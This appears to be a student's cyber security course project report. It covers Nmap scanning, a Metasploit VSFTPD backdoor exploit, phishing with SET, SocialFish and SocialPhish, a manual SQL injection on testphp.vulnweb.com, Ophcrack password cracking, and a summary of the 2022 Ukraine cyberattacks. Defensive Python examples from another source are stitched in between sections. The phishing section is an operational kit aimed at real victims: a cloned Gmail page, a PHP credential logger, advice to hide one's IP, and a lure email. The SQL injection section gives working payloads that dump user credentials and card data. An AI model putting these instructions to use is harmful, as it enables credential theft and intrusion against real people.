Verzeo November Major Project

The document outlines a cyber security project involving the use of Nmap and Metasploit tools to scan and exploit vulnerabilities on Windows and Kali Linux machines. It details the setup of a private network for safe scanning, the exploitation of a specific vulnerability in VSFTPD, and the creation of a phishing page to capture credentials. The project emphasizes the importance of understanding vulnerabilities and suggests security patches to mitigate risks.

Uploaded by

tnukavarapu

Cyber Security November Major Project

Project Description:

1. Perform the Scanning Module using the Nmap tool (downloaded from the Internet), scan the Kali Linux and Windows 7 machines, and find the open/closed ports and the services running on each machine.
Hacker machine: Windows 10. Victim machines: Kali Linux and Windows 7.

The first step to working with nmap is to log into the Kali Linux machine and, if desired, start a graphical session.
During installation, the installer prompts for a 'root' user password, which is needed to log in. Once logged in to the Kali Linux machine, the XFCE Desktop Environment can be started with the command 'startx'. It is worth noting that nmap does not require a desktop environment to run.

Once logged into XFCE, a terminal window will need to be opened. By clicking on the
desktop background, a menu will appear. Navigating to a terminal can be done as follows:
Applications -> System -> ‘Xterm‘ or ‘UXterm‘ or ‘Root Terminal ‘.
The author is a fan of the shell program called Terminator but this may not show up in a
default install of Kali Linux. All shell programs listed will work for the purposes of nmap.
Once a terminal has been launched, the nmap fun can begin. For this particular tutorial, a
private network with a Kali machine and a Metasploitable machine was created.
This made things easier and safer since the private network range would ensure that scans
remained on safe machines and prevents the vulnerable Metasploitable machine from
being compromised by someone else. In this example, both of the machines are on a
private 192.168.56.0 /24 network. The Kali machine has an IP address of 192.168.56.101
and the Metasploitable machine to be scanned has an IP address of 192.168.56.102.
Suppose, though, that the IP address information were unavailable. A quick nmap scan can help determine what is live on a particular network. This is known as a 'Simple List' scan, hence the -sL argument passed to the nmap command:
# nmap -sL 192.168.56.0/24

Nmap – Scan Network for Live Hosts
Sadly, this initial scan did not return any live hosts. Sometimes this is due to the way certain operating systems handle port-scan network traffic.

# nmap 192.168.56.1,100-102
These ports all indicate some sort of listening service on this particular machine. Recall from earlier that the 192.168.56.102 IP address is assigned to the Metasploitable vulnerable machine, which is why there are so many open ports on this host.

2. Test the system security using the Metasploit tool from Kali Linux and hack the Windows 7 / Windows 10 machine. Execute the commands to get keystrokes, screenshots, webcam captures, etc. Write a report on the vulnerability issue along with screenshots of how you performed it, and suggest the security patch to avoid these types of attacks.
Hacker machine: Kali Linux. Victim machine: Windows XP / Windows 7.

Metasploit Framework
The Metasploit Framework is an open-source penetration testing and
development platform that provides exploits for a variety of applications,
operating systems and platforms. Metasploit is one of the most commonly
used penetration testing tools and comes built-in to Kali Linux.

The main components of the Metasploit Framework are called modules. Modules are standalone pieces of code or software that provide functionality to Metasploit. There are six total modules: exploits, payloads, auxiliary, nops, posts, and encoders. We will just focus on exploits and payloads.
Exploit
An exploit takes advantage of a system’s vulnerability and installs a payload.
Payload
The payload gives access to the system by a variety of methods (reverse
shell, meterpreter etc.)

We will use both of these to gain access to the victim machine in the exercise detailed later.
Environment Setup
Virtualbox
Virtualbox is an operating system emulation software that gives us the
ability to run additional systems from our local machine.
Kali Linux
Kali Linux will be our local machine where we can run our attacks from.
Since we will need both Kali and the Metasploitable vulnerable machine
running we will use Virtualbox to emulate both environments.

Metasploitable 2

Metasploitable 2 is designed to be vulnerable in order to work as a sandbox to learn security. This provides us with a system to attack legally. Most of the vulnerabilities on Metasploitable are known, so there are tons of resources available to help learn various attack types.
Metasploitable Installation
The pictures below show the settings to setup a new virtual machine for
Metasploitable.
Metasploitable shouldn’t need more than 256MB of ram but you can add
more if your system can handle it.
Instead of creating a new hard disk the Metasploitable machine we
downloaded will act as our existing virtual hard disk.

We do not want the Metasploitable machine on our actual network, so configure the settings for that machine as below. Make sure the Kali machine is also on the Host-Only Adapter. (Settings or tabs not shown in the pictures below were left as default.)

Main settings page for Metasploitable

Make sure to change the network settings for Metasploitable to the Host-only adapter

Once we are done changing the settings, we can start Metasploitable. The
login and password are both: msfadmin. After logging in we can leave it
running and start up Kali Linux. From there we can work with the Metasploit
framework on Kali Linux.
Note: the password is not echoed to the screen while you type it.

Exploiting VSFTPD v2.3.4 Backdoor Command Execution

Now that everything is set up, we can focus on how to break into the Metasploitable 2 machine from our Kali Linux VM.

With Metasploitable 2, most if not all of the vulnerabilities are known. That is not usually the case: for systems in the wild there are many more steps to get into an unknown system or network. To get comfortable with the Metasploit Framework, we can look up vulnerabilities online and learn the workflow.

For this walk-through we will focus on VSFTPD v2.3.4. Exploiting this vulnerability provides a root shell via Backdoor Command Execution, meaning we will have full access to Metasploitable 2's command line.
Step 1: Start the Metasploit Console
Open the command terminal inside Kali and type
msfconsole

Opening the Metasploit console from the terminal

Now that the console has loaded, we can start preparing our exploit. VSFTPD (Very Secure FTP Daemon) is a secure FTP server for Unix-based systems. The vulnerability we are exploiting was found in 2011 in version 2.3.4 of VSFTPD and allows a user to connect to the server without authentication.
With Metasploit open we can search for the vulnerability by name:
search vsftpd
The search reveals the location of the exploit we want to run. We can select it using that location:
use exploit/unix/ftp/vsftpd_234_backdoor

Check the options to see what other information is necessary to run the exploit:
show options

We are missing the target IP but the rest of the information is automatically filled in.

The last piece of the setup is to point Metasploit at the victim machine, which is our Metasploitable 2 VM. Set RHOST to the IP of the Metasploitable machine:
set RHOST [victim IP]

The IP can be found using ifconfig within Metasploitable. The IP address is at the beginning of the second line, inet addr:192.168.56.100. Use the IP address that shows on your machine, since it will be different from the one shown here.

Checking the options one more time shows that all requirements are filled.

The final step is to run the exploit to gain access to Metasploitable:
run
As you can see above, we have gained access to Metasploitable remotely. A command shell has opened that allows us to navigate through the system and modify things as we go. From here we can wreak all sorts of havoc on the victim machine.
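A defender's counterpart to the scanning section (task 1) and the VSFTPD section above, added here as an example that is not part of the original report: it parses the normal output of an nmap -sV scan of the lab's two hosts, lists the open ports per host, and flags the vsftpd 2.3.4 banner the walkthrough exploits. The scan text is constructed sample data (the OpenSSH, telnet and MySQL banners are made up), and all function names are my own.

```python
"""Parse nmap -sV normal output and flag the vsftpd 2.3.4 service.
Added example; the scan text below is constructed, not a real capture."""
import re
from dataclasses import dataclass

# Constructed sample of `nmap -sV` output for the two lab hosts on the
# report's private 192.168.56.0/24 range (banners are invented).
SAMPLE_SCAN = """\
Nmap scan report for 192.168.56.101
Host is up (0.00021s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)

Nmap scan report for 192.168.56.102
Host is up (0.00031s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.4
22/tcp   open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet  Linux telnetd
3306/tcp open  mysql   MySQL 5.0.51a-3ubuntu5
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass(frozen=True)
class Service:
    host: str
    port: int
    proto: str
    state: str
    name: str
    version: str


def parse_nmap(text):
    """Return one Service per PORT line, attributed to the host reported above it."""
    services, host = [], None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and host:
            port, proto, state, name, version = m.groups()
            services.append(Service(host, int(port), proto, state, name, version.strip()))
    return services


def open_ports(services, host):
    """Sorted list of open port numbers for one host."""
    return sorted(s.port for s in services if s.host == host and s.state == "open")


# Banner prefixes to flag; only the version discussed in the report is listed.
FLAGGED_BANNERS = {
    "vsftpd 2.3.4": "VSFTPD 2.3.4 backdoor (exploit/unix/ftp/vsftpd_234_backdoor)",
}


def flag_vulnerable(services):
    """(host, port, note) for every open service whose banner matches a flagged prefix."""
    findings = []
    for s in services:
        if s.state != "open":
            continue
        for banner, note in FLAGGED_BANNERS.items():
            if s.version.startswith(banner):
                findings.append((s.host, s.port, note))
    return findings


if __name__ == "__main__":
    svcs = parse_nmap(SAMPLE_SCAN)
    for host in sorted({s.host for s in svcs}):
        print(host, "open ports:", open_ports(svcs, host))
    for host, port, note in flag_vulnerable(svcs):
        print(f"FLAG {host}:{port} {note}")
```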

3. Use the SET tool to create a fake Gmail page and try to capture the credentials on the command line. Hacker machine: Kali Linux. Victim machine: Windows XP / Windows 7 / Windows 10.
This procedure can be used to make a fake page for other websites like Yahoo, MSN, or any other site for which you want to steal a particular user's password.
Step 1:
Go to gmail.com. Save the page as a "complete HTML" file.
Step 2:
Once you have saved the login page completely, you will see an HTML file and a folder with a name something like "email from google files". There will be two image files, namely "google_transparent.gif" and "mail_logo.png".
Step 3:
Upload those images to tinypic or photobucket.com and copy the URL of each image.
Step 4:
Open the HTML file in WordPad.
Search for "google_transparent.gif" (without quotes) and replace it with the corresponding URL.
Search for "mail_logo.png" (without quotes) and replace it with the corresponding URL.
Step 5:
Search for
action="https://www.google.com/accounts/ServiceLoginAuth
and replace it with
action="http://[your site URL]/login.php"
then save the file.
Step 6:
Now you need to create login.php, so open Notepad and type the following:
<?php
// Send the browser on to the real login page.
header("Location: https://www.google.com/accounts/ServiceLoginAuth");
// Append every submitted field to pswrds.txt, one name=value per line.
$handle = fopen("pswrds.txt", "a");
foreach ($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
and save it.
Step 7:
Open Notepad and just save an empty file as "pswrds.txt".
Now upload those three files (namely the HTML file, login.php and pswrds.txt) to any subdomain web hosting site.
Note: the web hosting service must support PHP. Use one of these sites: 110mb.com, spam.com, justfree.com or 007sites.com.
Use that site through a secure-connection site (so that you can hide your IP address) like http://flyproxy.com; find the best secure-connection site.
Step 8:
Create an email address containing the keyword "gmail", like [email protected]
Step 9:
Send the victim a message along the lines of "Gmail starts a new feature; to use this service log in to this page" from that Gmail ID, with a link to your phishing web page.
We are going to clone gmail.com to construct our phishing page, so select option 2.
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.7
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.gmail.com
The best way to use this attack is if username and
password form
fields are available. Regardless, this captures all
POSTs on a website.
[!] I have read the above message.
Press <return> to continue
[*] Social-Engineer Toolkit Credential Harvester
Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives
below:
On selecting option 2, it asks for two important pieces of information. The first is the IP address to which it will submit the data, and the second is the URL to clone, which in this case is gmail.com.
So enter the details and press Enter when it asks you to press return. Now the credential harvester starts a web server on port 80 which serves the cloned gmail.com page. Open the IP address of the machine in a browser from some other machine, or just localhost. For example, if SET is running on a machine with IP address 192.168.1.10, then open "http://192.168.1.10" in a browser from another machine, or give the IP address to someone else over the network :)
Now, when the username and password are entered and submitted, SET captures the data and displays it on the terminal. Moreover, after capturing the data SET redirects the user to the actual site, that is gmail.com.
192.168.1.101 - - [15/Apr/2013 14:56:39] "GET / HTTP/1.1" 200 -
192.168.1.101 - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 -
192.168.1.101 - - [15/Apr/2013 14:56:41] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: continue=http://mail.google.com/mail/
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-2825129499091793842
PARAM: ltmpl=default
PARAM: scc=1
PARAM: GALX=W37Icb1p3hI
PARAM: pstMsg=1
PARAM: dnConn=
PARAM: checkConnection=
PARAM: checkedDomains=youtube
PARAM: timeStmp=
PARAM: secTok=
PARAM: _utf8=?
PARAM: bgresponse=!
POSSIBLE USERNAME FIELD FOUND: Email=ghj
POSSIBLE PASSWORD FIELD FOUND: Passwd=ghj
PARAM: signIn=Sign+in
PARAM: PersistentCookie=yes
PARAM: rmShown=1
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO
GENERATE A REPORT.
See the fields Email and Passwd: they contain the details typed by the user. If you want to carry out this hack on a real user like your friend or someone else, then you have to give them a link that they can open from their computer to access the SET clone of Gmail.
If you have SET running on your local machine, then you have to give your public IP address to the victim. He would open the link and get the login page of Gmail. The rest of the task is to persuade him to log in through that page. If you are able to do so, then you get the login details. The credential harvester attack is not limited to just stealing login data; it can capture any generic form submission.
Phishing attacks are very common in the form of spam emails. Hackers set up phishing pages on web hosts and then spread the links over email to users. The phishing pages range from simple email sites to bank logins and more.
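A check a defender can run on a saved login page, added here as an example that is not part of the original project: it parses the page's forms and reports the two things the steps above change, namely a password form whose action points at a host other than the site's own, and a password field submitted with method GET (which, like the login.php above reading $_GET, puts credentials into URLs and server logs). Both HTML samples and the placeholder action host are constructed; the function names are my own.

```python
"""Audit a saved login page for a rewritten form action or a GET-submitted
password field. Added example; the HTML below is constructed, not a real page."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for the edited "complete HTML" page; the action host is
# a placeholder, not a real site.
SAMPLE_PHISH = """
<html><body>
<form method="GET" action="http://yoursite-placeholder.example/login.php">
  <input type="text" name="Email">
  <input type="password" name="Passwd">
  <input type="submit" name="signIn" value="Sign in">
</form>
</body></html>
"""

# Constructed stand-in for the unmodified page.
SAMPLE_LEGIT = """
<form method="POST" action="https://www.google.com/accounts/ServiceLoginAuth">
  <input type="text" name="Email"><input type="password" name="Passwd">
</form>
"""


class FormCollector(HTMLParser):
    """Record each form's action, method and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "GET").upper(),
                             "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_login_page(html, expected_hosts):
    """Return a list of findings; an empty list means the password forms look consistent."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for f in parser.forms:
        if not f["has_password"]:
            continue
        host = urlparse(f["action"]).hostname or ""
        # A relative action (no host) is same-origin, so only a foreign host is flagged.
        if host and host not in expected_hosts:
            findings.append(f"password form posts to foreign host {host!r}")
        if f["method"] == "GET":
            findings.append("password submitted via GET (lands in URL and server logs)")
    return findings


if __name__ == "__main__":
    hosts = {"www.google.com", "accounts.google.com"}
    print("legit :", audit_login_page(SAMPLE_LEGIT, hosts))
    print("phish :", audit_login_page(SAMPLE_PHISH, hosts))
```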

4. Install the Social Phish tool from GitHub and try to execute the tool for a phishing page; perform this in a lab setup only.
To install SocialFish, we can either download it as a zip file or clone the GitHub repository from the terminal by running the command below.
git clone https://github.com/UndeadSec/SocialFish.git
After downloading, we move into the directory.
cd SocialFish

Once in the directory, we want to download all the requirements for running and using SocialFish.
pip install -r requirements.txt
When the installation is complete, we are ready to launch the phishing attack.

After the installation is complete, we have to make the SocialFish.py file executable. To do this, we use the command below.
chmod +x SocialFish.py
To run the tool, we use the syntax below.
./SocialFish.py <username> <pass>
In place of "<username>" we set the username we will use to log in, and "<pass>" is where we insert the password we will be using. We run it as shown below.
Once the tool starts, we can log in to the main page as indicated on the terminal shown below. To log in to the admin panel we navigate to the address "0.0.0.0:5000/Neptune".
We open our preferred web browser and navigate to the above specified link to
login as shown in the below image. From the main page, we can launch a phishing
attack on our target.
Once we login to the main page, we can see different useful components we can
use in our phishing.

As shown in the image above, we have a field to input the link of the website we want to clone and an input field for the web page we want to redirect to. You can also choose to use a custom HTML page. We have an option to inject beef-xss into our phishing page for use with the BeEF tool.
SocialFish also has an access token in case you want to connect it to your Android app for easier phishing attack management. The Send mail option lets us send the phishing email directly to our target's inbox from the main page, as shown in the image below.

After the phishing is complete, we can generate a complete phishing report using
the button on the main page too.
At the bottom of the phishing page is where we will be able to view our phishing
reports and we can also perform deeper information gathering on our targets. We
can scan for open ports and even use shodan to gather more information.
In this guide we will be launching a custom attack hence we will use the custom
page as shown on the image below.
Now after the user enters his/her credentials he/she will be redirected to
www.google.com.

This step is usually optional and is used only when your target is not on the same local area network as you are. Using this option makes the SocialFish instance you are running accessible to anyone with an active Internet connection.
Ngrok helps us tunnel the traffic sent through the port we are using on SocialFish, which is port 5000, using the command below.
ngrok http 5000
You can share the link generated by ngrok with the target. Once he/she clicks on the link, he/she will be directed to the login page as shown in the image below.
Once the victim enters the user email address and the password and signs in, he/she will be redirected to the link we provided earlier. Now the details have been logged on the admin page and we can view them as shown in the image below.

Step 1: Open your Kali Linux operating system and move to the Desktop. Here you have to create a directory called Socialphish, in which you will install the tool.
cd Desktop

Step 2: Now you are on the Desktop. Here you have to create a directory called Socialphish. To create the Socialphish directory use the following command.
mkdir Socialphish
Step 3: You have created a directory. Now use the following command to move into that directory.
cd Socialphish

Step 4: Now you are in the Socialphish directory. In this directory you have to download the tool, i.e. clone it from GitHub. Use the following command to clone the tool from GitHub.
git clone https://github.com/xHak9x/SocialPhish.git
Step 5: The tool has been downloaded into the directory Socialphish. Now, to list the contents that have been downloaded, use the following command.
ls

Step 6: When you list the contents you can see that a new directory, SocialPhish, has been created by the clone. You have to move into this directory to view the contents of the tool. To move into this directory use the following command.
cd SocialPhish
Step 7: To list the contents of this directory use the following command.
ls

Step 8: Now you have to give execute permission to the tool using the following command.
chmod +x socialphish.sh

Step 9: Now you can run the tool using the following command. This
command will open the help menu of the tool.
./socialphish.sh
The tool is running successfully. Now you have to give the option
number to the tool for which you have to create the phishing page.
Suppose you want to create a phishing page for Instagram then you
have to choose option 1. If you want a phishing page on Facebook
choose option 2. Similarly, you can choose from all 33 websites in the
tool.

Usage:
Use Socialphish to create a phishing page for Instagram: type 01 (Instagram) and then 02 for port forwarding.

You can see the link that has been generated by the tool; it is the Instagram phishing web page. Send this link to the victim. Once he/she opens the link, he/she gets an original-looking Instagram web page, and once he/she fills in the details on the web page, they are highlighted in the Socialphish terminal.
You can see here that we have filled in the login form with the username geeky and the password geekygeeky; once the victim clicks on login, all the details are shown in the Socialphish terminal.
You can see the credentials have been found. You can also perform this attack yourself against your target. This was all about Socialphish.
Socialphish is a powerful open-source phishing tool. Socialphish is becoming very popular nowadays and is used to carry out phishing attacks on targets. Socialphish is easier to use than the Social Engineering Toolkit. Socialphish contains some templates generated by another tool called Socialfish. Socialphish offers phishing templates and web pages for 33 popular sites such as Facebook, Instagram, Google, Snapchat, GitHub, Yahoo, Protonmail, Spotify, Netflix, LinkedIn, WordPress, Origin, Steam, Microsoft, etc.

5. Perform SQL injection manually on http://testphp.vulnweb.com. Write a report along with screenshots and mention preventive steps to avoid SQL injections.

Let's begin!
http://www.hackingarticles.in/beginner-guide-sql-injection-part-1/
Open the target URL given below in the browser:
http://testphp.vulnweb.com/artists.php?artist=1
So here we are going to test SQL injection for "id=1".

Now use the error-based technique by adding an apostrophe (') at the end of the input, which will try to break the query.
testphp.vulnweb.com/artists.php?artist=1'
In the screenshot you can see that we got an error message, which means the site is vulnerable to SQL injection.

Now use the ORDER BY keyword to sort the records in ascending or descending order for id=1:
http://testphp.vulnweb.com/artists.php?artist=1 order by 1
Similarly, repeat for order by 2, 3 and so on, one by one:
http://testphp.vulnweb.com/artists.php?artist=1 order by 2

http://testphp.vulnweb.com/artists.php?artist=1 order by 4
From the screenshot, you can see that we got an error at order by 4, which means the query returns only three columns.
Let's penetrate further using union-based injection to select data from a different table:
http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3
From the screenshot, you can see it shows the result for only one table, not for the others.

Now try to pass invalid input into the database through the URL by changing artist=1 to artist=-1 as given below:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3
Hence you can see it is now showing the result for the remaining two tables also.
Use the next query to fetch the name of the database:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,database(),3
From the screenshot, you can read the database name: acuart.

The next query extracts the current username as well as the version of the database system:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,version(),current_user()
Here we have retrieved 5.1.73 0ubuntu0 10.04.1 as the version and acuart@localhost as the current user.
Through the next query, we try to fetch the table names inside the database:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1
From the screenshot you can read that the name of the first table is artists.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1
From the screenshot you can read that the name of the second table is carts.

Similarly, repeat the same query for another table with a slight change:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1
We got table 3: cater

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1
We got table 4: featured
Similarly, repeat the same query for tables 4, 5, 6 and 7, making slight changes to LIMIT.
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 7,1
We got table 7: users

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 8,1
Since we didn't get anything when the limit is set to 8,1, there are probably only 8 tables inside the database.
The concat function is used to concatenate two or more strings into a single string:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
From the screen you can see that through the concat function we have successfully retrieved all the table names inside the database.
Table 1: artist
Table 2: Carts
Table 3: Cater
Table 4: Featured
Table 5: Guestbook
Table 6: Pictures
Table 7: Product
Table 8: users
Maybe we can get some important data from the users table, so let's penetrate further. Again, use the concat function on the table users to retrieve all of its column names:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
Awesome!! We successfully retrieved all eight column names from inside the table users.
Then I chose only four columns, i.e. uname, pass, email and cc, for further enumeration.

Use the concat function to select uname from the table users by executing the following query through the URL:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(uname),3 from users
From the screenshot, you can read uname: test

Use the concat function to select pass from the table users by executing the following query through the URL:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(pass),3 from users
From the screenshot, you can read pass: test

Use the concat function to select cc (credit card) from the table users by executing the following query through the URL:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(cc),3 from users
From the screenshot, you can read cc: 1234-5678-2300-9000

Use the concat function to select email from the table users by executing the following query through the URL:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(email),3 from users
From the screenshot, you can read email: [email protected]
Enjoy hacking!!
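The preventive step the task asks for, shown as working code. This is an added example, not code from the report or from testphp.vulnweb.com: an artists.php-style query that splices the artist parameter into the SQL text sits beside a parameterized version, and both are run against an in-memory SQLite stand-in whose table and column names mirror the walkthrough (artists with three selected columns, users with uname/pass/email/cc) but whose rows are made up. It reproduces the apostrophe error, the ORDER BY column-count probe and the UNION dump from above, and shows the bound query returning nothing for the same inputs.

```python
"""Vulnerable artists.php-style query next to a parameterized one, run against
an in-memory SQLite stand-in. Added example; schema mirrors the report, data is fake."""
import sqlite3


def make_db():
    """Constructed in-memory database; names follow the report, values are invented."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE artists (artist_id INTEGER, aname TEXT, adesc TEXT);
        INSERT INTO artists VALUES (1, 'r4w8173', 'Lorem ipsum');
        CREATE TABLE users (uname TEXT, pass TEXT, email TEXT, cc TEXT);
        INSERT INTO users VALUES ('test', 'test', 'test@example.com', '0000-0000-0000-0000');
    """)
    return con


SELECT = "SELECT aname, adesc, artist_id FROM artists WHERE artist_id = "


def artists_vulnerable(con, artist_param):
    """Mirrors the injectable page: the raw URL value is spliced into the SQL text.
    Returns rows, or the error text (the error-based probe from the walkthrough)."""
    try:
        return con.execute(SELECT + artist_param).fetchall()
    except sqlite3.Error as e:
        return f"DB error: {e}"


def artists_safe(con, artist_param):
    """Hardened version: validate the type, then bind the value as a parameter so
    the driver never interprets it as SQL (binding alone would already stop the
    injection; the int() check additionally rejects junk early)."""
    try:
        artist_id = int(artist_param)
    except ValueError:
        return []  # not an integer id: refuse instead of guessing
    return con.execute(
        "SELECT aname, adesc, artist_id FROM artists WHERE artist_id = ?",
        (artist_id,),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    probes = [
        "1",                                                   # normal request
        "1'",                                                  # apostrophe: breaks the query
        "1 order by 3",                                        # column-count probe: still works
        "1 order by 4",                                        # column-count probe: error => 3 columns
        "-1 union select 1,group_concat(uname),3 from users",  # dumps another table
    ]
    for p in probes:
        print(f"{p!r:55} vulnerable -> {artists_vulnerable(db, p)!r}")
        print(f"{'':55} safe       -> {artists_safe(db, p)!r}")
```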

6. Crack the password of a Windows machine using the Ophcrack tool in a virtual machine running Windows 7 and try to get the password; along with that, mention the path of the SAM file in Windows and explain the SAM file's usage and how it can be cracked by the tool.

1. Download the Ophcrack LiveCD.
Search "Ophcrack" on Google and open the following page. Click "Download ophcrack Live CD", choose "ophcrack Vista LiveCD" on the next page and download it.

2. Burn the ISO image file to a CD/DVD or USB flash drive (taken as the example here).
After downloading, you will find that ophcrack Vista is an ISO image file. You should burn the Ophcrack ISO image file to a blank medium, such as a writable USB flash drive or CD/DVD. Burning an ISO file is different from burning a normal file: it needs a tool such as UltraISO or ISO2Disc to burn the ISO file onto a USB drive or CD/DVD.
3. Boot the Windows 7 computer from the disc you have just burned.
After burning ophcrack onto the disc, boot the computer from it by rebooting with the newly created USB disc or CD/DVD in the drive. Then Linux will load, Ophcrack will start, and Windows password recovery begins.
Tip: if the burned disc does not boot Ophcrack when the machine is rebooted, verify that two directories are present on the CD: boot and tables.
4. Recover the Windows user password.
Ophcrack will locate the users on your Windows system and begin cracking their passwords. The password recovery process is automatic. When the passwords are displayed on screen, write them down.

5. Remove the Ophcrack disc and log in to Windows with the recovered password.
As noted in the introduction at the beginning of this passage, the recovery success rate of Ophcrack has not reached 100%. So what should you do if Ophcrack cannot find the Windows 7 password? Please refer to it if necessary.
7. Write an article on cybersecurity and recent attacks which you came across in media and news, research that news, and explain any topic which you learned in this course and mention what you learned.
Cybersecurity attacks are a growing threat to all of us. What are the recent cybersecurity attacks?
This article will help you learn about the cybersecurity attacks of recent years. But first, what is a cybersecurity attack?

Cybersecurity Attack: Definition


In simple words, a cyberattack is a deliberate attempt to gain unauthorized access to, disrupt, or damage a computer system or network, or the data it holds.
Common types include:
1. Malware
2. Ransomware
3. Phishing
4. Man-in-the-middle
5. Cryptojacking
6. DoS/DDoS (denial of service)
7. SQL injection
8. Zero-day attacks
Now, we know about the definition of cyberattacks. We also know the common
attacks.
Let us find out the recent cybersecurity attacks that hit the cyber world.

2022 Ukraine cyberattacks

From Wikipedia, the free encyclopedia

(Figure: Ukrainian Ministry of Foreign Affairs website defaced by hackers)
During the prelude to the 2022 Russian invasion of Ukraine and the 2022 Russian
invasion of Ukraine, multiple cyberattacks against Ukraine were recorded, as well
as some attacks on Russia. The first major cyberattack took place on 14 January
2022, and took down more than a dozen of Ukraine's government websites.[1]
According to Ukrainian officials, around 70 government websites, including the
Ministry of Foreign Affairs, the Cabinet of Ministers, and the Security and Defense
Council, were attacked. Most of the sites were restored within hours of the
attack.[2] On 15 February, another cyberattack took down multiple government
and bank services.[3][4]
On 24 February, Russia launched a full-scale invasion of Ukraine. Western intelligence officials believed that this would be accompanied by a major cyberattack against Ukrainian infrastructure, but this threat did not materialize.[5] Cyberattacks on Ukraine have continued during the invasion, but with limited success. Independent hacker groups, such as Anonymous, have launched cyberattacks on Russia in retaliation for the invasion.[5][6]
Background
At the time of the attack, tensions between Russia and Ukraine were high, with
over 100,000 Russian troops stationed near the border with Ukraine and talks
between Russia and NATO ongoing.[1] The US government alleged that Russia was
preparing for an invasion of Ukraine, including "sabotage activities and
information operations". The US also allegedly found evidence of "a false-flag operation" in Eastern Ukraine, which could be used as a pretext for invasion.[2]
Russia denies the accusations of an impending invasion, but has threatened
"military-technical action" if its demands are not met, especially a request that
NATO never admit Ukraine to the alliance. Russia has spoken strongly against the
expansion of NATO to its borders.[2]
January attacks
The attacks on 14 January 2022 consisted of the hackers replacing the websites
with text in Ukrainian, erroneous Polish, and Russian, which state "be afraid and
wait for the worst" and allege that personal information has been leaked to the
internet.[7] About 70 government websites were affected, including the Ministry of
Foreign Affairs, the Cabinet of Ministers, and the Security and Defense Council.[8]
The SBU has stated that no data was leaked. Soon after the message appeared, the sites were taken offline. The sites were mostly restored within a few hours.[1]
Deputy secretary of the NSDC Serhiy Demedyuk, stated that the Ukrainian
investigation of the attack suspects that a third-party company's administration
rights were used to carry out the attack. The unnamed company's software had
been used since 2016 to develop government sites, most of which were affected
in the attack.[8] Demedyuk also blamed UNC1151, a hacker group allegedly linked
to Belarusian intelligence, for the attack.[9]
A separate destructive malware attack took place around the same time, first appearing on 13 January. First detected by the Microsoft Threat Intelligence Center (MSTIC), malware was installed on devices belonging to "multiple government, non-profit, and information technology organizations" in Ukraine.[10] Later, this was reported to include the State Emergency Service and the Motor Transport Insurance Bureau.[11] The software, attributed by Microsoft to the actor it tracks as DEV-0586 and named WhisperGate, was designed to look like ransomware, but lacks a recovery feature, indicating an intent to simply destroy files instead of encrypting them for ransom.[10]
The MSTIC reported that the malware was programmed to execute when the
targeted device was powered down. The malware would overwrite the master
boot record (MBR) with a generic ransom note. Next, the malware downloads a
second .exe file, which would overwrite all files with certain extensions from a
predetermined list, deleting all data contained in the targeted files. The
ransomware payload differs from a standard ransomware attack in several ways,
indicating a solely destructive intent.[12] However, later assessments indicate that damage was limited, likely a deliberate choice by the attackers.[11]
